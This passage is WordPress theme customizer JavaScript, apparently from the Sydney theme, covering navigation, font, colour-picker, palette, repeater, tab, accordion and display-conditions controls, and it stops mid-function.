"use strict";

/* Customizer Back Button */
jQuery(document).ready(function ($) {

	// Store the previous section in a global variable to use later
	let previous_section = '';
	$( '.sydney-to-widget-area-link' ).on( 'click', function(){
		
		// Sections
		if( $( this ).closest( '.control-section' ).length ) {
			previous_section = $( this ).closest( '.control-section' ).attr( 'id' ).replace( 'sub-accordion-section-', '' );
		}

	} );

	// Flag when hidden section content is active
	let is_any_header_footer_section = false,
		is_hidden_section_content = false,
		is_header_builder_section = false,
		is_header_builder_component_section = false,
		is_footer_builder_section = false,
		is_footer_builder_component_section = false;

	$( document ).on( 'mouseover focus', '.customize-section-back', function(e){
		if( ! $( '.control-section.open' ).length ) {
			return false;
		}

		is_any_header_footer_section        = $( '.control-section.open' ).attr( 'id' ).indexOf( '_hb_' ) || $( '.control-section.open' ).attr( 'id' ).indexOf( '_fb_' ) ? true : false;
		is_hidden_section_content 			= $( '.control-section.open' ).hasClass( 'control-section-sydney-section-hidden' ) ? true : false;
		is_header_builder_section 			= $( '.control-section.open' ).attr( 'id' ) === 'sub-accordion-section-sydney_section_hb_wrapper' ? true : false;
		is_header_builder_component_section = $( '.control-section.open' ).attr( 'id' ).indexOf( 'sydney_section_hb_component_' ) !== -1 ? true : false;
		is_footer_builder_section 			= $( '.control-section.open' ).attr( 'id' ) === 'sub-accordion-section-sydney_section_fb_wrapper' ? true : false;
		is_footer_builder_component_section = $( '.control-section.open' ).attr( 'id' ).indexOf( 'sydney_section_fb_component_' ) !== -1 ? true : false;
	} );

	// If hidden section content is active, focus on the previous section (from global variable)
	$( document ).on( 'click keydown', '.customize-section-back', function(e){
		if( e.keyCode && e.keyCode !== 13 && e.keyCode !== 27 ) {
			return false;
		}

		// Enhanced logic for header panel navigation
		// back button should return to main customizer instead of header panel sections
		var current_panel = wp.customize.state('expandedPanel').get();
		var current_section = wp.customize.state('expandedSection').get();
		var $publishSettings = $('#sub-accordion-section-publish_settings');
		var isPublishSettingsOpen = $publishSettings.hasClass('open');
		
		// If publish settings is open and we're in header panel, close publish settings and collapse header panel
		if(
			isPublishSettingsOpen && 
			current_panel && 
			(
				current_panel.id === 'sydney_panel_header' ||
				current_panel.id === 'sydney_panel_footer'
			)
		) {
			// Prevent the default behavior
			e.preventDefault();
			e.stopPropagation();
			
			// Close the publish settings section first
			wp.customize.section('publish_settings').collapse();
			
			// Then collapse the header panel to return to main customizer
			wp.customize.panel( 'sydney_panel_header' ).collapse();
			
			// Reset flags and return early
			is_any_header_footer_section = false;
			is_header_builder_section = false;
			is_header_builder_component_section = false;
			is_footer_builder_section = false;
			is_footer_builder_component_section = false;
			is_hidden_section_content = false;
			return false;
		}

		if( is_header_builder_section ) {
			wp.customize.section( 'sydney_section_hb_wrapper' ).collapse();
			setTimeout(function(){
				wp.customize.panel( 'sydney_panel_header' ).collapse();
			}, 10);
		}
		
		if( is_footer_builder_section ) {
			wp.customize.section( 'sydney_section_fb_wrapper' ).collapse();
			setTimeout(function(){
				wp.customize.panel( 'sydney_panel_footer' ).collapse();
			}, 10);
		}

		if( ! is_any_header_footer_section && ! is_footer_builder_component_section && ! is_header_builder_component_section && is_hidden_section_content && previous_section !== '' ) {
			if ( typeof wp.customize.section( previous_section ) !== 'undefined' ) {
				wp.customize.section( previous_section ).focus();
			}
		}

		is_any_header_footer_section = false;
		is_header_builder_section = false;
		is_header_builder_component_section = false;
		is_footer_builder_section = false;
		is_footer_builder_component_section = false;
		is_hidden_section_content = false;
	} );

});

//Add spacing for CPT panels
jQuery( document ).ready(function($) {
	var panels = $('li[id^="accordion-panel-sydney_panel_cpt_"]');
	panels.first().css( 'margin-top', '10px' );
	panels.last().css( 'margin-bottom', '10px' );
} );

jQuery( document ).ready( function() {

    /* === Checkbox Multiple Control === */

    jQuery( '.customize-control-checkbox-multiple input[type="checkbox"]' ).on(
        'change',
        function() {

            checkbox_values = jQuery( this ).parents( '.customize-control' ).find( 'input[type="checkbox"]:checked' ).map(
                function() {
                    return this.value;
                }
            ).get().join( ',' );

            jQuery( this ).parents( '.customize-control' ).find( 'input[type="hidden"]' ).val( checkbox_values ).trigger( 'change' );
        }
    );
    

} ); // jQuery( document ).ready

/* Typography */
jQuery(document).ready(function ($) {
  "use strict";

  $('.google-fonts-list').each(function (i, obj) {
    if (!$(this).hasClass('select2-hidden-accessible')) {
      $(this).select2();
    }
  });
  $('.google-fonts-list').on('change', function () {
    var elementRegularWeight = $(this).parent().parent().find('.google-fonts-regularweight-style');
    var selectedFont = $(this).val();
    var customizerControlName = $(this).attr('control-name'); // Clear Weight/Style dropdowns

    elementRegularWeight.empty(); // Make sure Italic & Bold dropdowns are enabled
    // Get the Google Fonts control object

    var bodyfontcontrol = _wpCustomizeSettings.controls[customizerControlName]; // Find the index of the selected font

    var indexes = $.map(bodyfontcontrol.sydneyfontslist, function (obj, index) {
      if (obj.family === selectedFont) {
        return index;
      }
    });
    var index = indexes[0]; // For the selected Google font show the available weight/style variants

    $.each(bodyfontcontrol.sydneyfontslist[index].variants, function (val, text) {
      elementRegularWeight.append($('<option></option>').val(text).html(text)); //Set default value

      if ($(elementRegularWeight).find('option[value="regular"]').length > 0) {
        $(elementRegularWeight).val('regular');
      } else if ($(elementRegularWeight).find('option[value="400"]').length > 0) {
        $(elementRegularWeight).val('400');
      } else if ($(elementRegularWeight).find('option[value="300"]').length > 0) {
        $(elementRegularWeight).val('300');
      }
    }); // Update the font category based on the selected font

    $(this).parent().parent().find('.google-fonts-category').val(bodyfontcontrol.sydneyfontslist[index].category);
    sydneyGetAllSelects($(this).parent().parent().parent().parent());
  });
  $('.google_fonts_select_control select').on('change', function () {
    sydneyGetAllSelects($(this).parent().parent().parent().parent());
  });

  function sydneyGetAllSelects($element) {
    var selectedFont = {
      font: $element.find('.google-fonts-list').val(),
      regularweight: $element.find('.google-fonts-regularweight-style').val(),
      category: $element.find('.google-fonts-category').val()
    }; // Important! Make sure to trigger change event so Customizer knows it has to save the field

    $element.find('.customize-control-google-font-selection').val(JSON.stringify(selectedFont)).trigger('change');
  }
});
jQuery(document).ready(function ($) {
  "use strict";

  let clickFlag = false;

$('.sydney-devices-preview button').on('click', function () {
	if (clickFlag) {
		clickFlag = false;
		return false;
	}
	
	clickFlag = true;
	
	// Determine the selected device based on class name
	let device = $(this).hasClass('preview-desktop')
		? 'desktop'
		: $(this).hasClass('preview-tablet')
			? 'tablet'
			: 'mobile';
	
	// Update preview classes
	$('.sydney-devices-preview')
		.find('.preview-desktop, .preview-tablet, .preview-mobile')
		.removeClass('active')
		.end()
		.find('.preview-' + device)
		.addClass('active');
	
	// Update font-size classes
	$('.font-size-desktop, .font-size-tablet, .font-size-mobile')
		.removeClass('active')
		.filter('.font-size-' + device)
		.addClass('active');
	
	// Update responsive control classes
	$('.responsive-control-desktop, .responsive-control-tablet, .responsive-control-mobile')
		.removeClass('active')
		.filter('.responsive-control-' + device)
		.addClass('active');
	
	// Trigger the corresponding device button in the footer overlay
	$('.wp-full-overlay-footer .devices button[data-device="' + device + '"]').trigger('click');
});
$(' .wp-full-overlay-footer .devices button ').on('click', function () {
    if (clickFlag) {
      clickFlag = false;
      return false;
    }
    var device = $(this).attr('data-device');
    $('.control-section.open .sydney-devices-preview').find('.preview-' + device).trigger('click');
  });
});
/**
 * Repeater
 */

jQuery(document).ready(function ($) {
  "use strict"; // Update the values for all our input fields and initialise the sortable repeater

  $('.sydney-sortable_repeater_control').each(function () {
    // If there is an existing customizer value, populate our rows
    var defaultValuesArray = $(this).find('.customize-control-sortable-repeater').val().split(',');
    var numRepeaterItems = defaultValuesArray.length;

    if (numRepeaterItems > 0) {
      // Add the first item to our existing input field
      $(this).find('.repeater-input').val(defaultValuesArray[0]); // Create a new row for each new value

      if (numRepeaterItems > 1) {
        var i;

        for (i = 1; i < numRepeaterItems; ++i) {
          sydneyAppendRow($(this), defaultValuesArray[i]);
        }
      }
    }
  }); // Make our Repeater fields sortable

  $(this).find('.sydney-sortable_repeater.sortable').sortable({
    update: function update(event, ui) {
      sydneyGetAllInputs($(this).parent());
    }
  }); // Remove item starting from it's parent element

  $('.sydney-sortable_repeater.sortable').on('click', '.customize-control-sortable-repeater-delete', function (event) {
    event.preventDefault();
    var numItems = $(this).parent().parent().find('.repeater').length;

    if (numItems > 1) {
      $(this).parent().slideUp('fast', function () {
        var parentContainer = $(this).parent().parent();
        $(this).remove();
        sydneyGetAllInputs(parentContainer);
      });
    } else {
      $(this).parent().find('.repeater-input').val('');
      sydneyGetAllInputs($(this).parent().parent().parent());
    }
  }); // Add new item

  $('.customize-control-sortable-repeater-add').click(function (event) {
    event.preventDefault();
    sydneyAppendRow($(this).parent());
    sydneyGetAllInputs($(this).parent());
  }); // Refresh our hidden field if any fields change

  $('.sydney-sortable_repeater.sortable').change(function () {
    sydneyGetAllInputs($(this).parent());
  }); // Add https:// to the start of the URL if it doesn't have it

  $('.sydney-sortable_repeater.sortable').on('blur', '.repeater-input', function () {
    var url = $(this);
    var val = url.val();

    if (val && !val.match(/^.+:\/\/.*/)) {
      // Important! Make sure to trigger change event so Customizer knows it has to save the field
      url.val('https://' + val).trigger('change');
    }
  }); // Append a new row to our list of elements

  function sydneyAppendRow($element) {
    var defaultValue = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : '';
    var newRow = '<div class="repeater" style="display:none"><input type="text" value="' + defaultValue + '" class="repeater-input" placeholder="https://" /><span class="dashicons dashicons-menu"></span><a class="customize-control-sortable-repeater-delete" href="#"><span class="dashicons dashicons-no-alt"></span></a></div>';
    $element.find('.sortable').append(newRow);
    $element.find('.sortable').find('.repeater:last').slideDown('slow', function () {
      $(this).find('input').focus();
    });
  } // Get the values from the repeater input fields and add to our hidden field


  function sydneyGetAllInputs($element) {
    var inputValues = $element.find('.repeater-input').map(function () {
      return $(this).val();
    }).toArray(); // Add all the values from our repeater fields to the hidden field (which is the one that actually gets saved)

    $element.find('.customize-control-sortable-repeater').val(inputValues); // Important! Make sure to trigger change event so Customizer knows it has to save the field

    $element.find('.customize-control-sortable-repeater').trigger('change');
  }
});
/**
 * Alpha color picker
 */
/* Color Control */
jQuery(document).ready(function ($) {

	var $colorControls = $('.sydney-color-control');

	if ($colorControls.length && Pickr) {

		var getCurrentSwatches = function () {
			var colors = [];
			$('#customize-control-custom_palette .sydney-color-input').each(function () {
				colors.push($(this).val().toLowerCase());
			});
			return colors;
		}

		//add the swatches to the dropdown
		var swatch = $('.global-colors-dropdown');
		swatch.each(function () {
			var colors = getCurrentSwatches();
			var $this = $(this);
			
			var element = $this.data('element');

			var $globalInput = $this.next('.sydney-connected-global').val();

			$.each(colors, function (index, value) {
				$this.append('<div class="global-color" data-global-setting="global_color_' + (index+1) + '" data-color="' + value + '"><span style="display:flex;align-items:center;"><span class="color-circle" style="background-color:' + value + '"></span>Global color ' + (index+1) + '</span><span class="color-value">' + value + '</span></div>');
			
				if ( $globalInput == 'global_color_' + (index+1) ) {
					$this.find('.global-color').eq(index).addClass('active');

					$this.prev('.dashicons').addClass('active');
				}
			});

			$this.on('click', '.global-color', function () {
				var $this 	= $(this);
				var $globalInput = $this.parent().next('.sydney-connected-global');

				//add active class to dashicon
				$this.parent().prev('.dashicons').addClass('active');

				//add active class
				$this.toggleClass('active').siblings().removeClass('active');

				if ( $this.hasClass('active') ) {
					$globalInput.val($this.data('global-setting'));
					sydneyChangeElementColors(element, $this.data('color'));
				} else {
					$globalInput.val('');
					$this.parent().prev('.dashicons').removeClass('active');
				}
				
				$globalInput.trigger('change');
			} );
		});

		//toggle the swatches
		$('.sydney-global-control .dashicons').on('click', function () {
			
			$(this).next('.global-colors-dropdown').toggleClass('show');

			//close other swatches
			$('.global-colors-dropdown').not($(this).next('.global-colors-dropdown')).removeClass('show');
		});

		//close the swatches when clicking outside
		$(document).on('click', function (e) {
			if ( !$(e.target).closest('.sydney-global-control').length ) {
				$('.global-colors-dropdown').removeClass('show');
			}
		});

		$colorControls.each(function () {

			var $colorControl = $(this);
			var $colorPicker = $colorControl.find('.sydney-color-picker');
			var inited;
			
			$colorPicker.on('click', function () {

				if (!inited) {

					var $colorInput = $colorControl.find('.sydney-color-input');
					var customizeControl = wp.customize($colorInput.data('customize-setting-link'));					

					var pickr = new Pickr({
						el: $colorPicker.get(0),
						container: 'body',
						theme: 'sydney',
						default: $colorInput.val() || '',
						//swatches: [],
						position: 'bottom-end',
						appClass: 'sydney-pcr-app',
						sliders: 'h',
						useAsButton: true,
						components: {
							hue: true,
							preview: true,
							opacity: true,
							interaction: {
								input: true,
								clear: true,
							},
						},
						i18n: {
							'btn:clear': 'Default',
						},
					});

					pickr.on('change', function (color) {

						var colorCode;

						if (color.a === 1) {
							pickr.setColorRepresentation('HEX');
							colorCode = color.toHEXA().toString(0);
						} else {
							pickr.setColorRepresentation('RGBA');
							colorCode = color.toRGBA().toString(0);
						}

						$colorPicker.css({ 'background-color': colorCode });
						$colorInput.val(colorCode);
						customizeControl.set(colorCode);

					});

					// Disconnect global if manually changed
					pickr.on('change', function (color, source) {
						if ( 'slider' === source ) {
							$colorPicker.parent().prev('.sydney-global-control').find('.dashicons').removeClass('active');
							$colorPicker.parent().prev('.sydney-global-control').find('.sydney-connected-global').val('');
							$colorPicker.parent().prev('.sydney-global-control').find('.global-color').removeClass('active');
						}
					});

					pickr.on('clear', function () {

						var defaultColor = $colorPicker.data('default-color');

						if (defaultColor) {
							pickr.setColor(defaultColor);
						} else {
							$colorPicker.css({ 'background-color': 'white' });
							$colorInput.val('');
							customizeControl.set('');
						}

					});

					$colorPicker.data('pickr', pickr);

					setTimeout(function () {
						pickr.show();
					});

					inited = true;

				}

			});

		});

	}
});


/**
 * Tab control
 */

jQuery(document).ready(function ($) {
  "use strict";

  $('.customize-control-sydney-tab-control').each(function () {
    $(this).parent().find('li').not('.section-meta').not('.customize-control-sydney-tab-control').addClass('sydney-hide-control');
    var generals = $(this).find('.control-tab-general').data('connected');
    $.each(generals, function (i, v) {
      $(this).removeClass('sydney-hide-control'); //show
    });
    $(this).find('.control-tab').on('click', function () {
      var visibles = $(this).data('connected');
      $(this).addClass('active');
      $(this).siblings().removeClass('active');
      $(this).parent().parent().parent().find('li').not('.section-meta').not('.customize-control-sydney-tab-control').addClass('sydney-hide-control');
      $.each(visibles, function (i, v) {
        $(this).removeClass('sydney-hide-control'); //show
      });
    });
  });
});
/**
 * TinyMCE control
 */

jQuery(document).ready(function ($) {
  "use strict";

  $('.customize-control-tinymce-editor').each(function () {
    // Get the toolbar strings that were passed from the PHP Class
    var tinyMCEToolbar1String = _wpCustomizeSettings.controls[$(this).attr('id')].sydneytb1;

    var tinyMCEToolbar2String = _wpCustomizeSettings.controls[$(this).attr('id')].sydneytb2;

    var tinyMCEMediaButtons = _wpCustomizeSettings.controls[$(this).attr('id')].sydneytmb;

    wp.editor.initialize($(this).attr('id'), {
      tinymce: {
        wpautop: true,
        toolbar1: tinyMCEToolbar1String,
        toolbar2: tinyMCEToolbar2String
      },
      quicktags: true,
      mediaButtons: true
    });
  });
  $(document).on('tinymce-editor-init', function (event, editor) {
    editor.on('change', function (e) {
      tinyMCE.triggerSave();
      $('#' + editor.id).trigger('change');
    });
  });
});
/**
 * Footer widget areas links
 */

jQuery(document).ready(function ($) {
  var footerCols = $('#customize-control-footer_widget_areas').find('input:checked');
  toggleLinks(footerCols);
  $('#customize-control-footer_widget_areas').find('input').change(function () {
    toggleLinks($(this));
  });

  function toggleLinks(el) {
    if ('3' === $(el).val() || 'col3-bigleft' === $(el).val() || 'col3-bigright' === $(el).val()) {
      $('.footer-widget-area-link-1, .footer-widget-area-link-2, .footer-widget-area-link-3').show();
      $('.footer-widget-area-link-4').hide();
    } else if ('4' === $(el).val() || 'col4-bigleft' === $(el).val() || 'col4-bigright' === $(el).val()) {
      $('.footer-widget-area-link-1, .footer-widget-area-link-2, .footer-widget-area-link-3, .footer-widget-area-link-4').show();
    } else if ('2' === $(el).val() || 'col2-bigleft' === $(el).val() || 'col2-bigright' === $(el).val()) {
      $('.footer-widget-area-link-1, .footer-widget-area-link-2').show();
      $('.footer-widget-area-link-4, .footer-widget-area-link-3').hide();
    } else if ('1' === $(el).val()) {
      $('.footer-widget-area-link-1').show();
      $('.footer-widget-area-link-4, .footer-widget-area-link-2, .footer-widget-area-link-3').hide();
    } else {
      $('.footer-widget-area-link-1, .footer-widget-area-link-2, .footer-widget-area-link-3, .footer-widget-area-link-4').hide();
    }
  }
});
/**
 * Palettes
 */

wp.customize('color_palettes', function (control) {
  var palettes = jQuery('#customize-control-color_palettes').find('.radio-buttons').data('palettes');
  control.bind(function () {
    var palette = control.get(); //Color 1 Button color, Link color

    var elements1 = ['custom_color1', 'scrolltop_bg_color', 'button_background_color', 'button_border_color', 'color_link_default'];

    for (var _i = 0, _elements = elements1; _i < _elements.length; _i++) {
      var element = _elements[_i];
      wp.customize(element).set(palettes[palette][0]);
      jQuery('#customize-control-' + element).find('.wp-color-result').css('background-color', palettes[palette][0]);
    } //Color 2 Hover color for - Button, Headings, Titles, Text links, Nav links


    var elements2 = ['custom_color2', 'footer_widgets_links_hover_color', 'scrolltop_bg_color_hover', 'button_background_color_hover', 'button_border_color_hover', 'color_link_hover'];

    for (var _i2 = 0, _elements2 = elements2; _i2 < _elements2.length; _i2++) {
      var _element = _elements2[_i2];
      wp.customize(_element).set(palettes[palette][1]);
      jQuery('#customize-control-' + _element).find('.wp-color-result').css('background-color', palettes[palette][1]);
    } //Color 3 Heading (1-6), Small text, Nav links, Site title, 


    var elements3 = ['single_post_title_color', 'custom_color3', 'main_header_submenu_color', 'offcanvas_menu_color', 'mobile_header_color', 'footer_widgets_title_color', 'single_product_title_color', 'color_forms_text', 'shop_product_product_title', 'loop_post_meta_color', 'loop_post_title_color', 'main_header_color', 'site_title_color', 'site_description_color', 'color_heading_1', 'color_heading_2', 'color_heading_3', 'color_heading_4', 'color_heading_5', 'color_heading_6'];

    for (var _i3 = 0, _elements3 = elements3; _i3 < _elements3.length; _i3++) {
      var _element2 = _elements3[_i3];
      wp.customize(_element2).set(palettes[palette][2]);
      jQuery('#customize-control-' + _element2).find('.wp-color-result').css('background-color', palettes[palette][2]);
    } //Color 4 Paragraph, Paragraph small, Breadcrums, Icons


    var elements4 = ['custom_color4', 'footer_widgets_links_color', 'footer_widgets_text_color', 'color_body_text', 'footer_credits_text_color', 'color_forms_placeholder'];

    for (var _i4 = 0, _elements4 = elements4; _i4 < _elements4.length; _i4++) {
      var _element3 = _elements4[_i4];
      wp.customize(_element3).set(palettes[palette][3]);
      jQuery('#customize-control-' + _element3).find('.wp-color-result').css('background-color', palettes[palette][3]);
    } //Color 5 Input, tag borders


    var elements5 = ['custom_color5', 'color_forms_borders'];

    for (var _i5 = 0, _elements5 = elements5; _i5 < _elements5.length; _i5++) {
      var _element4 = _elements5[_i5];
      wp.customize(_element4).set(palettes[palette][4]);
      jQuery('#customize-control-' + _element4).find('.wp-color-result').css('background-color', palettes[palette][4]);
    } //Color 6 Footer background, Subtle backgrounds


    var elements6 = ['custom_color6', 'footer_widgets_background', 'footer_credits_background', 'content_cards_background'];

    for (var _i6 = 0, _elements6 = elements6; _i6 < _elements6.length; _i6++) {
      var _element5 = _elements6[_i6];
      wp.customize(_element5).set(palettes[palette][5]);
      jQuery('#customize-control-' + _element5).find('.wp-color-result').css('background-color', palettes[palette][5]);
    } //Color 7 Default background, Text on dark BG


    var elements7 = ['custom_color7', 'background_color', 'button_color', 'button_color_hover', 'scrolltop_color', 'scrolltop_color_hover', 'color_forms_background'];

    for (var _i7 = 0, _elements7 = elements7; _i7 < _elements7.length; _i7++) {
      var _element6 = _elements7[_i7];
      wp.customize(_element6).set(palettes[palette][6]);
      jQuery('#customize-control-' + _element6).find('.wp-color-result').css('background-color', palettes[palette][6]);
    } //Color 8 header background


    var elements8 = ['custom_color8', 'main_header_submenu_background', 'main_header_background', 'main_header_bottom_background', 'mobile_header_background', 'offcanvas_menu_background'];

    for (var _i8 = 0, _elements8 = elements8; _i8 < _elements8.length; _i8++) {
      var _element7 = _elements8[_i8];
      wp.customize(_element7).set(palettes[palette][7]);
      jQuery('#customize-control-' + _element7).find('.wp-color-result').css('background-color', palettes[palette][7]);
    }
  });
});
/**
 * Custom palette
 */

wp.customize.bind('ready', function () {
  wp.customize('custom_color1', function (control) {
    control.bind(function (value) {
      var elements1 = ['scrolltop_bg_color', 'button_background_color', 'button_border_color', 'color_link_default'];

      for (var _i9 = 0, _elements9 = elements1; _i9 < _elements9.length; _i9++) {
        var element = _elements9[_i9];
        wp.customize(element).set(value);
        jQuery('#customize-control-' + element).find('.wp-color-result').css('background-color', value);
      }
    });
  });
  wp.customize('custom_color2', function (control) {
    control.bind(function (value) {
      var elements2 = ['footer_widgets_links_hover_color', 'scrolltop_bg_color_hover', 'button_background_color_hover', 'button_border_color_hover', 'color_link_hover'];

      for (var _i10 = 0, _elements10 = elements2; _i10 < _elements10.length; _i10++) {
        var element = _elements10[_i10];
        wp.customize(element).set(value);
        jQuery('#customize-control-' + element).find('.wp-color-result').css('background-color', value);
      }
    });
  });
  wp.customize('custom_color3', function (control) {
    control.bind(function (value) {
      var elements3 = ['main_header_submenu_color', 'offcanvas_menu_color', 'mobile_header_color', 'footer_widgets_title_color', 'single_product_title_color', 'color_forms_text', 'shop_product_product_title', 'loop_post_meta_color', 'loop_post_title_color', 'main_header_color', 'site_title_color', 'site_description_color', 'color_heading_1', 'color_heading_2', 'color_heading_3', 'color_heading_4', 'color_heading_5', 'color_heading_6'];

      for (var _i11 = 0, _elements11 = elements3; _i11 < _elements11.length; _i11++) {
        var element = _elements11[_i11];
        wp.customize(element).set(value);
        jQuery('#customize-control-' + element).find('.wp-color-result').css('background-color', value);
      }
    });
  });
  wp.customize('custom_color4', function (control) {
    control.bind(function (value) {
      var elements4 = ['footer_widgets_links_color', 'footer_widgets_text_color', 'color_body_text', 'footer_credits_text_color', 'color_forms_placeholder'];

      for (var _i12 = 0, _elements12 = elements4; _i12 < _elements12.length; _i12++) {
        var element = _elements12[_i12];
        wp.customize(element).set(value);
        jQuery('#customize-control-' + element).find('.wp-color-result').css('background-color', value);
      }
    });
  });
  wp.customize('custom_color5', function (control) {
    control.bind(function (value) {
      var elements5 = ['color_forms_borders'];

      for (var _i13 = 0, _elements13 = elements5; _i13 < _elements13.length; _i13++) {
        var element = _elements13[_i13];
        wp.customize(element).set(value);
        jQuery('#customize-control-' + element).find('.wp-color-result').css('background-color', value);
      }
    });
  });
  wp.customize('custom_color6', function (control) {
    control.bind(function (value) {
      var elements6 = ['footer_widgets_background', 'footer_credits_background', 'content_cards_background'];

      for (var _i14 = 0, _elements14 = elements6; _i14 < _elements14.length; _i14++) {
        var element = _elements14[_i14];
        wp.customize(element).set(value);
        jQuery('#customize-control-' + element).find('.wp-color-result').css('background-color', value);
      }
    });
  });
  wp.customize('custom_color7', function (control) {
    control.bind(function (value) {
      var elements7 = ['background_color', 'button_color', 'button_color_hover', 'scrolltop_color', 'scrolltop_color_hover', 'color_forms_background'];

      for (var _i15 = 0, _elements15 = elements7; _i15 < _elements15.length; _i15++) {
        var element = _elements15[_i15];
        wp.customize(element).set(value);
        jQuery('#customize-control-' + element).find('.wp-color-result').css('background-color', value);
      }
    });
  });
  wp.customize('custom_color8', function (control) {
    control.bind(function (value) {
      var elements8 = ['main_header_submenu_background', 'main_header_background', 'main_header_bottom_background', 'mobile_header_background', 'offcanvas_menu_background'];

      for (var _i16 = 0, _elements16 = elements8; _i16 < _elements16.length; _i16++) {
        var element = _elements16[_i16];
        wp.customize(element).set(value);
        jQuery('#customize-control-' + element).find('.wp-color-result').css('background-color', value);
      }
    });
  });
});

/**
 * Move color picker text field in popup
 */

jQuery(document).ready(function ($) {
  $('.wp-picker-input-wrap').each(function () {
    $(this).prependTo($(this).next('.wp-picker-holder'));
  });
});
/**
 * Transform palettes radio into dropdown
 */

jQuery(document).ready(function ($) {
  var saved = $('.saved-palette');
  $('.saved-palette').on('click', function () {
    $('.palette-radio-buttons').toggleClass('open');
  });
  $('.palette-radio-buttons').find('.palette').on('click', function () {
    saved.empty();
    $('.palette-radio-buttons').removeClass('open');
    var clone = $(this).parent().clone();
    clone.unwrap().appendTo(saved).find('input').remove();
  });
});
/**
 * Accordion control
 */

jQuery(document).ready(function ($) {
  var Sydney_Accordion = {
    init: function init() {
      this.firstTime = true;

      if (!this.initialized) {
        this.events();
      }

      this.initialized = true;
    },
    events: function events() {
      var self = this; // Toggle accordion

      $(document).on('click', '.sydney-accordion-title', function () {
        var $this = $(this);

        if ($(this).hasClass('expanded')) {
          self.showOrHide($(this), 'hide');
          $(this).removeClass('expanded').addClass('collapse');
          setTimeout(function () {
            $this.removeClass('collapse');
          }, 300);
        }

        if (!$(this).hasClass('collapse')) {
          // Open one accordion item per time 
          $('.sydney-accordion-item').addClass('sydney-accordion-hide');
          $('.sydney-accordion-title').removeClass('expanded'); // Show accordion content

          self.showOrHide($(this), 'show');
          $this.addClass('expanded');
        }
      }); // Mount the accordion when enter in the section (with accordions inside)
      // Also used to collapse all accordions when navigating between others tabs

      $(document).on('click', '.control-section', function (e) {
        var $section = $('.control-section.open');

        if (self.firstTime && $section.find('.sydney-accordion-title').length) {
          $section.find('.sydney-accordion-title').each(function () {
            self.showOrHide($(this), 'hide');
            $(this).removeClass('expanded');
            self.firstTime = false;
          });
        }
      }); // Reset the first time

      $(document).on('click', '.customize-section-back', function () {
        self.firstTime = true;
      });
      return this;
    },
    showOrHide: function showOrHide($this, status) {
      var current = '';
      current = $this.closest('.customize-control').next();
      var elements = [];

      if (current.attr('id') == 'customize-control-' + $this.data('until')) {
        elements.push(current[0].id);
      } else {
        while (current.attr('id') != 'customize-control-' + $this.data('until')) {
          elements.push(current[0].id);
          current = current.next();
        }
      }

      if (elements.length >= 1) {
        elements.push(current[0].id);
      }

      for (var i = 0; i < elements.length; i++) {
        // Identify accordion items
        $('#' + elements[i]).addClass('sydney-accordion-item active'); // Hide or show the accordion content

        if (status == 'hide') {
          $('#' + elements[i]).addClass('sydney-accordion-hide');
        } else {
          $('#' + elements[i]).removeClass('sydney-accordion-hide');
        } // Identify first accordion item


        if (i == 0) {
          $('#' + elements[i]).addClass('sydney-accordion-first-item');
        } // Identify last accordion item


        if (i == elements.length - 1 && elements.length > 1 || elements.length == 1) {
          $('#' + elements[i]).addClass('sydney-accordion-last-item');
        }
      }

      return this;
    }
  };
  $(document).ready(function () {
    Sydney_Accordion.init();
  });
});


/**
 * Controls a11y
 */

 jQuery(document).ready(function ($) {
  "use strict";

  $('.customize-control-sydney-toggle-control').each(function () {
    
    $(this).find('label').on('keydown', function (event) {
      var enterPressed = (event.key === 'Enter' || event.keyCode === 13);

      if (!enterPressed) { 
        return; 
      }

      $( this ).click();
    });
  });

  $('.customize-control-sydney-radio-buttons').each(function () {
    
    $(this).find('label').on('keydown', function (event) {
      var enterPressed = (event.key === 'Enter' || event.keyCode === 13);

      if (!enterPressed) { 
        return; 
      }

      $( this ).click();
    });
  });

});

/**
 * Display Conditions Control
 */

 jQuery(document).ready(function ($) {
	$(document).on('sydney-display-conditions-select2-initalize', function (event, item) {
	  var $item = $(item);
	  var $control = $item.closest('.sydney-display-conditions-control');
	  var $typeSelectWrap = $item.find('.sydney-display-conditions-select2-type');
	  var $typeSelect = $typeSelectWrap.find('select');
	  var $conditionSelectWrap = $item.find('.sydney-display-conditions-select2-condition');
	  var $conditionSelect = $conditionSelectWrap.find('select');
	  var $idSelectWrap = $item.find('.sydney-display-conditions-select2-id');
	  var $idSelect = $idSelectWrap.find('select');
	  $typeSelect.select2({
		width: '100%',
		minimumResultsForSearch: -1
	  });
	  $typeSelect.on('select2:select', function (event) {
		$typeSelectWrap.attr('data-type', event.params.data.id);
	  });
	  $conditionSelect.select2({
		width: '100%'
	  });
	  $conditionSelect.on('select2:select', function (event) {
		var $element = $(event.params.data.element);

		if ($element.data('ajax')) {
		  $idSelectWrap.removeClass('hidden');
		} else {
		  $idSelectWrap.addClass('hidden');
		}

		$idSelect.val(null).trigger('change');
	  });
	  var isAjaxSelected = $conditionSelect.find(':selected').data('ajax');

	  if (isAjaxSelected) {
		$idSelectWrap.removeClass('hidden');
	  }

	  $idSelect.select2({
		width: '100%',
		placeholder: '',
		allowClear: true,
		minimumInputLength: 1,
		ajax: {
		  url: ajaxurl,
		  dataType: 'json',
		  delay: 250,
		  cache: true,
		  data: function data(params) {
			return {
			  action: 'sydney_display_conditions_select_ajax',
			  term: params.term,
			  nonce: syd_data.ajax_nonce,
			  source: $conditionSelect.val()
			};
		  },
		  processResults: function processResults(response, params) {
			if (response.success) {
			  return {
				results: response.data
			  };
			}

			return {};
		  }
		}
	  });
	});
	$(document).on('click', '.sydney-display-conditions-modal-toggle', function (event) {
	  event.preventDefault();
	  var $button = $(this);
	  var template = wp.template('sydney-display-conditions-template');
	  var $control = $button.closest('.sydney-display-conditions-control');
	  var $modal = $control.find('.sydney-display-conditions-modal');

	  if (!$modal.data('initialized')) {
		$control.append(template($control.data('condition-settings')));
		var $items = $control.find('.sydney-display-conditions-modal-content-list-item').not('.hidden');

		if ($items.length) {
		  $items.each(function () {
			$(document).trigger('sydney-display-conditions-select2-initalize', this);
		  });
		}

		$modal = $control.find('.sydney-display-conditions-modal');
		$modal.data('initialized', true);
		$modal.addClass('open');
	  } else {
		$modal.toggleClass('open');
	  }
	});
	$(document).on('click', '.sydney-display-conditions-modal', function (event) {
	  event.preventDefault();
	  var $modal = $(this);

	  if ($(event.target).is($modal)) {
		$modal.removeClass('open');
	  }
	});
	$(document).on('click', '.sydney-display-conditions-modal-add', function (event) {
	  event.preventDefault();
	  var $button = $(this);
	  var $control = $button.closest('.sydney-display-conditions-control');
